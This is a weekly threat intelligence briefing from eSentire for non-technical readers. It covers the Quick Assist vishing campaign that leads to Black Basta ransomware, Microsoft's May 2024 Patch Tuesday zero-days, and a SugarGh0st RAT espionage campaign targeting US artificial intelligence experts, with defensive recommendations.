eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
Quick Assist Abused in Social Engineering Attacks Leading to Black Basta Ransomware
Bottom Line: The misuse of remote assistance tools in social engineering attacks, exemplified by the recent exploitation of Microsoft's Quick Assist by Storm-1811 to deliver ransomware, highlights the persistent and evolving nature of cybersecurity threats. Organizations must remain vigilant and implement proactive measures to mitigate the risks associated with such attacks.
On May 15th, Microsoft Threat Intelligence released a report on the cybercriminal group Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks leading to ransomware deployment. Quick Assist is a remote assistance tool developed by Microsoft, intended to facilitate technical support and troubleshooting between users.
Attacks typically begin with vishing (voice phishing), where threat actors impersonate IT support staff to trick users into granting remote access via Quick Assist. This initial breach of trust is often facilitated by exploiting common fears or concerns, such as purported security threats or system vulnerabilities. Once access is obtained, the attackers deploy various malicious tools and malware, including ScreenConnect, Qakbot, and Cobalt Strike. ScreenConnect, a remote desktop tool, allows attackers to maintain persistent access and manipulate the victim's system. Qakbot, a notorious banking trojan, is used to steal sensitive financial information and login credentials, providing the attackers with valuable data that can be monetized or used in future attacks. Cobalt Strike, a sophisticated penetration testing tool repurposed for malicious activities, facilitates lateral movement within the network, allowing the attackers to identify and compromise additional systems.
The ultimate goal of these intrusions is the deployment of Black Basta ransomware. Black Basta is an infamous form of ransomware, encrypting files and rendering systems inoperable to extort victims for a ransom payment in exchange for the decryption key.
On May 10th, Cybersecurity and Infrastructure Security Agency (CISA) along with the Federal Bureau of Investigation (FBI), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA) on Black Basta ransomware as part of an ongoing “#StopRansomware” effort, aimed at informing network defenders. The report details the sophisticated tactics and tools used by the Black Basta ransomware group. They typically gain initial access through phishing emails or exploiting public-facing applications. Once inside, they utilize network scanners and PowerShell scripts to disable antivirus software and other defenses. For lateral movement, they employ tools such as BITSAdmin, PsExec, and remote desktop protocols, alongside Cobalt Strike beacons. They escalate privileges using Mimikatz and exploiting known vulnerabilities like ZeroLogon and PrintNightmare. To exfiltrate data and deploy encryption, they use RClone and the ChaCha20 algorithm, while deleting shadow copies with vssadmin.exe.
eSentire has detections in place to identify malicious use of ScreenConnect, as well as QakBot, Cobalt Strike, and Black Basta. Additionally, the eSentire Threat Intelligence team is performing threat hunts based on known Indicators of Compromise (IoCs) related to this campaign. eSentire has observed activity that matches the information provided by Microsoft. In the case observed by eSentire, activity was disrupted prior to the attempted deployment of Black Basta. Previously, in the October 2023 TRU Intelligence Briefing, eSentire discussed the increased use of Remote Monitoring and Management (RMM) tools by multiple ransomware groups.
eSentire Threat Intelligence Analysis:
The misuse of Quick Assist by Storm-1811 highlights the increasing sophistication of social engineering attacks. This trend exemplifies the importance of robust cybersecurity awareness training for employees to recognize and resist phishing and vishing attempts. By understanding the tactics employed by threat actors and implementing appropriate defensive measures, businesses can better protect themselves against such attacks.
One of the key takeaways from these incidents is the critical role in cybersecurity awareness training. Educating employees about the various forms of social engineering attacks, such as vishing, and empowering them to report suspicious activities can significantly reduce the likelihood of successful breaches. Additionally, abiding by the principle of least privilege organizations can help limit the potential impact of a security breach. This can be accomplished by restricting access to sensitive systems and resources only to those individuals who require it for their job functions.
Microsoft's recommendation to disable or uninstall Quick Assist and other unused remote management tools serves as a practical defense strategy against social engineering attacks. By reducing the attack surface, organizations can limit the avenues through which malicious actors can exploit vulnerabilities and gain unauthorized access to systems. Disabling or removing unnecessary tools minimizes the potential points of entry for attackers, effectively closing off potential vectors for exploitation.
Microsoft Patch Tuesday
Bottom Line: May 14th marked Microsoft’s monthly Patch Tuesday release. This month, Microsoft highlighted two zero-day vulnerabilities, which are confirmed to be actively exploited by threat actors. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.
In Microsoft’s May Patch Tuesday release, the company addressed a total of 61 separate vulnerabilities; one vulnerability was publicly disclosed prior to the release of security patches, and two of the vulnerabilities are confirmed to have been exploited by threat actors. The actively exploited zero-day vulnerabilities are tracked as CVE-2024-30040 and CVE-2024-30051. CVE-2024-30040 (CVSS: 8.8) is a Windows MSHTML Platform Security Feature Bypass vulnerability. A threat actor that exploited this vulnerability by convincing a user to interact with a malicious file, could achieve code execution. Microsoft has not shared on details on real-world attacks involving exploitation of this vulnerability, but in an attack scenario, it is most likely that threat actors would deliver the malicious file via email.
CVE-2024-30051 (CVSS: 7.8) is a Windows DWM Core Library Elevation of Privilege vulnerability. An attacker, with previously established access to a vulnerable system, could exploit CVE-2024-30051 to gain system privileges. The vulnerability was discovered and reported to Microsoft by Kaspersky, which released a report on real-world exploitation. In mid-April 2024, Kaspersky observed CVE-2024-30051 being exploited in attacks involving QakBot and various other malware families. According to Kaspersky, it is “believe that multiple threat actors have access to it (the exploit)”.
While only two of the 61 vulnerabilities are confirmed to be exploited at this time, organizations are strongly recommended to review the full patch release and apply all relevant security patches. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify vulnerable devices. Additionally, the eSentire product suite contains a variety of detections for QakBot activity.
eSentire Threat Intelligence Analysis:
As exploitation of multiple vulnerabilities has been confirmed, it is critical that organizations address the vulnerabilities outlined in Microsoft’s May Patch Tuesday release. It is strongly recommended to prioritize the patching of known exploited vulnerabilities and vulnerabilities in Internet facing applications. Internet facing applications are more likely to be targeted by threat actors, especially if they contain vulnerabilities that enable remote and unauthenticated access.
It should be noted that Microsoft states three zero-day vulnerabilities were addressed in this patch release, but in the above details, eSentire Threat Intelligence only outlines two specific vulnerabilities. Microsoft has shifted their definition of zero-day vulnerabilities to mean,“a flaw in software for which no official patch or security update has been released”. By this definition, any vulnerability that is public knowledge OR exploited by threat actors, and lacks a security patch, is a zero-day. Other major vendors, including eSentire, follow the classic definition of zero-day, which requires confirmed exploitation prior to patch release. The third vulnerability that Microsoft tracks as a zero-day, but has not been exploited in the wild, is CVE-2024-30046 (CVSS: 5.9), a Denial of Service (DoS) vulnerability in Visual Studio.
Microsoft is not the only company to address actively exploited vulnerabilities this month. Over the past week, Google has disclosed three zero-day vulnerabilities that all impact Google Chrome. While Google has not shared any information on their use in attacks, all readers are urged to ensure that they are operating the most recently available Chrome version (Chrome 125.0.6422.60 [Linux] 125.0.6422.60/.61 [Windows, Mac]). Chrome versions may be verified by navigating to Settings, followed by About Chrome. Updates in Chrome are applied automatically but require user to restart their browser.
The eSentire Threat Intelligence team continues to track notable vulnerabilities from this and other releases.
Campaign Targets American Artificial Intelligence Experts
Bottom Line: Organizations and individuals involved in emerging technologies face elevated risks of cyber espionage, exemplified by a recent campaign targeting U.S.-based Artificial Intelligence experts to acquire a technical edge.
On May 16th, researchers from Proofpoint released a report on a cyber espionage campaign targeting American Artificial Intelligence (AI) experts. This campaign, attributed to the group UNK_SweetSpecter, utilized advanced tactics and a well-crafted delivery mechanism to compromise its high-value targets.
The SugarGh0st Remote Access Trojan (RAT), a customized variant of the notorious Gh0stRAT, was delivered through phishing emails containing AI-themed lures. These emails included a ZIP file attachment containing a Windows shortcut (LNK) file. This file, in turn, executed a JavaScript dropper which displayed a decoy document to distract the victim while silently installing the SugarGh0st RAT payload. Persistence was maintained by modifying a registry key, ensuring the malware remained active on the infected system. These methods allowed the malware to evade initial detection and establish a connection to the threat actor’s Command-and-Control (C2) infrastructure for continuous data exfiltration and remote control.
eSentire Threat Intelligence Analysis:
The highly targeted nature of this campaign is notable and implies significant reconnaissance and planning prior to engaging targets. UNK_SweetSpecter is not opportunistic and appears to have highly specific goals; the targeting of AI experts suggests an interest in acquiring sensitive AI research. Given the sophistication of the methods and the specific targeting, this campaign has potential to be state sponsored. Proofpoint has not attributed UNK_SweetSpecter, to any known groups or state, but they do specifically mention the repeated identification of Chinese language artifacts during investigations. It is possible that UNK_SweetSpecter is associated with the Chinese state, however there is currently not enough evidence to make any formal attribution. Sophisticated state-sponsored APT groups are known to include details in their malware that would lead to misattribution; this tactic is known as a False Flag, and often relies on including language from a foreign state.
AI related organizations and researchers are a valuable target for both financially motivated threat actors and state sponsored APTs. Attackers may steal information for espionage purposes, to sell on dark web markets, or to enable future attacks. Additionally, threat actors may poison AI training models, deploy encryption/destructive malware, or perform a variety of other malicious actions. Organizations developing or performing research into emerging technologies need to adjust their threat model to include advanced threat actors and the risk of campaigns to specifically target these technologies. Defense strategies should include rigorous phishing awareness training, regular security audits, and multi-layered defenses like advanced email filtering and endpoint detection.
The eSentire Threat Intelligence team is tracking this campaign and performing Threat Hunts based on shared Indicators of Compromise (IoCs).
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
